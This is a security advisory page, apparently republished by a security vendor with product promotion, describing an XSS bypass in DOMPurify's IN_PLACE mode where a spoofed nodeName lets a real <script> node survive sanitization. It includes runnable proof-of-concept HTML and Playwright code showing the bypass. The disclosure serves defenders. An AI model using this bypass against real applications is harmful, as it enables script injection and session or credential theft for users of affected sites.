GHSA-X4VX-RJVF-J5P4

GHSA-X4VX-RJVF-J5P4 is a low-severity cross-site scripting (XSS) vulnerability in dompurify (npm), affecting versions <= 3.4.6. No fixed version is listed yet.

Summary

When DOMPurify.sanitize(root, { IN_PLACE: true }) is called on an attacker-supplied live DOM node, DOMPurify still trusts currentNode.nodeName for non-form nodes in the main _sanitizeElements pipeline. A real <script> child node whose observable nodeName is attacker-controlled can therefore be misclassified as an allowed element and retained. When the sanitized tree is inserted into a live document, the script executes.

This affects current 3.4.6. The recent IN_PLACE hardening work covers clobbered form handling and foreign-realm shadow/template traversal, but does not harden the main per-node element decision for hostile non-form live nodes.

Affected

  • DOMPurify 3.4.6
  • Any caller that does DOMPurify.sanitize(node, { IN_PLACE: true }) on attacker-supplied live DOM nodes
  • Verified attacker-controlled node sources:
    • same-origin iframe → live node passed by reference
    • same-origin window.open() popup → live node passed by reference
    • same-origin foreign node adopted into the host document via document.adoptNode(node) and then sanitized in-place

Not affected:

  • String-input DOMPurify.sanitize(dirtyString)

Vulnerability details

Code paths

[A], _sanitizeElements uses the instance-visible nodeName for the allow/forbid decision:

const _sanitizeElements = function (currentNode: any): boolean {
  ...
  if (_isClobbered(currentNode)) {
    _forceRemove(currentNode);
    return true;
  }

  const tagName = transformCaseFunc(currentNode.nodeName);
  ...
  if (
    FORBID_TAGS[tagName] ||
    (!(...) && !ALLOWED_TAGS[tagName])
  ) {
    ...
    _forceRemove(currentNode);
    return true;
  }
  ...
};

For non-form nodes, _isClobbered(currentNode) returns false early. The subsequent element decision therefore trusts currentNode.nodeName directly.

[B], _isClobbered is form-specific:

const _isClobbered = function (element: Element): boolean {
  const realTagName = getNodeName ? getNodeName(element) : null;
  if (typeof realTagName !== 'string') {
    return false;
  }

  if (transformCaseFunc(realTagName) !== 'form') {
    return false;
  }

  return (...);
};

The hardening is intentionally scoped to form. Non-form nodes are not checked for divergence between the instance-visible property view and the trusted prototype getter view.

Why the bypass works

The attack does not depend on string HTML parsing. It depends on a hostile live DOM object crossing a trust boundary into DOMPurify's IN_PLACE pipeline.

If the attacker controls a same-origin subcontext (iframe or popup), they can prepare a real DOM subtree there and then pass the live node object by reference to a host page that trusts DOMPurify.sanitize(node, { IN_PLACE: true }) as its final sanitization step.

For the verified primitive below:

  • the real child node is <script>
  • its script text is attacker-controlled
  • the observable nodeName is attacker-controlled and made to appear as "DIV"
  • _sanitizeElements therefore classifies the real <script> child as an allowed element
  • the real <script> survives in the sanitized tree and executes on insertion

This primitive survives:

  • direct reference passing
  • document.adoptNode(node) followed by IN_PLACE

It does not survive:

  • importNode
  • cloneNode

because those paths materialize a fresh node and discard the hostile object semantics.

Proof of concept

(1) Minimal, runnable in a single browser context

<!doctype html>
<html><body>
<script src="dist/purify.js"></script>
<script>
  const foreign = window.open('about:blank', '_blank', 'noopener=no');

  const host = foreign.document.createElement('div');
  const script = foreign.document.createElement('script');
  script.textContent = 'window.__pwned = 1';
  Object.defineProperty(script, 'nodeName', {
    value: 'DIV',
    configurable: true,
  });
  host.appendChild(script);

  DOMPurify.sanitize(host, { IN_PLACE: true });

  console.log('output:', host.outerHTML);
  // <div><script>window.__pwned = 1</script></div>

  window.__pwned = 0;
  document.body.appendChild(host);
  console.log('handler fired:', window.__pwned === 1); // true
</script>
</body></html>

(2) End-to-end, Playwright

const { chromium } = require('playwright');
const path = require('path');

(async () => {
  const browser = await chromium.launch();
  const page = await browser.newPage();
  await page.goto('about:blank');
  await page.addScriptTag({ path: path.resolve('dist/purify.js') });

  const result = await page.evaluate(async () => {
    window.__hits = [];

    const foreign = window.open('about:blank', '_blank', 'noopener=no');
    const host = foreign.document.createElement('div');
    const script = foreign.document.createElement('script');
    script.textContent = 'top.__hits.push("script-fired")';
    Object.defineProperty(script, 'nodeName', {
      value: 'DIV',
      configurable: true,
    });
    host.appendChild(script);

    DOMPurify.sanitize(host, { IN_PLACE: true });
    document.body.appendChild(host);

    return {
      version: DOMPurify.version,
      output: host.outerHTML,
      fired: window.__hits.includes('script-fired'),
    };
  });

  console.log(result);
  await browser.close();
})();

Observed:

  • Chromium / Firefox / WebKit
{
  version: '3.4.6',
  output: '<div><script>top.__hits.push("script-fired")</script></div>',
  fired: true
}

Direct

XSS via retained real <script> nodes inside attacker-supplied live DOM objects.

Any consumer that uses DOMPurify.sanitize(node, { IN_PLACE: true }) as a security boundary for live DOM objects supplied by a lower-trust same-origin subcontext is vulnerable.

The typical pattern is:

// attacker-controlled same-origin subcontext prepares a live node
const foreignNode = attackerFrame.contentWindow.makeNode();

// host treats DOMPurify as the last security gate
DOMPurify.sanitize(foreignNode, { IN_PLACE: true });
container.appendChild(foreignNode);

If foreignNode is a hostile live DOM object whose real child is <script> but whose observable nodeName is attacker-controlled, the sanitized output still contains the real script node when re-inserted into the live document.

Indirect / second-order

  • Applications that accept same-origin plugin / extension / widget DOM and rely on IN_PLACE as the final sanitization step
  • Editor or design-tool architectures where lower-trust subcontexts submit live DOM subtrees to a higher-trust host for in-place sanitization

Impact

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

dompurify (<= 3.4.6)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

No fixed version is listed for GHSA-X4VX-RJVF-J5P4 yet.

In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is GHSA-X4VX-RJVF-J5P4? GHSA-X4VX-RJVF-J5P4 is a low-severity cross-site scripting (XSS) vulnerability in dompurify (npm), affecting versions <= 3.4.6. No fixed version is listed yet. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of dompurify are affected by GHSA-X4VX-RJVF-J5P4? dompurify (npm) versions <= 3.4.6 is affected.
  3. Is there a fix for GHSA-X4VX-RJVF-J5P4? No fixed version is listed for GHSA-X4VX-RJVF-J5P4 yet. Monitor the advisory for updates and apply mitigations in the interim.
  4. Is GHSA-X4VX-RJVF-J5P4 exploitable, and should I be worried? Whether GHSA-X4VX-RJVF-J5P4 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether GHSA-X4VX-RJVF-J5P4 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix GHSA-X4VX-RJVF-J5P4? No fixed version is listed yet. In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.

Other vulnerabilities in dompurify

CVE-2026-49978CVE-2026-49458CVE-2026-49459CVE-2026-41240CVE-2026-41239

Stop the waste.
Protect your environment with Kodem.